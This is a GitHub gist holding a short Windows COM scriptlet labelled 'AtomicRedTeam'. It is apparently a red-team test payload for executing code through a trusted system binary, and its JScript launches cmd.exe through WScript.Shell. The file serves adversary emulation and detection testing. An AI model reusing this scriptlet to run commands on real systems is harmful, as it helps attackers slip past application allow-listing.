Skip to content

Instantly share code, notes, and snippets.

@Numbers11
Created March 13, 2018 17:49
Show Gist options
  • Save Numbers11/700f9721ab8305829c26eb86b7ea0668 to your computer and use it in GitHub Desktop.
Save Numbers11/700f9721ab8305829c26eb86b7ea0668 to your computer and use it in GitHub Desktop.
<?XML version="1.0"?>
<scriptlet>
<registration
description="AtomicRedTeam"
progid="AtomicRedTeam"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
</registration>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
]]>
</script>
</scriptlet>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment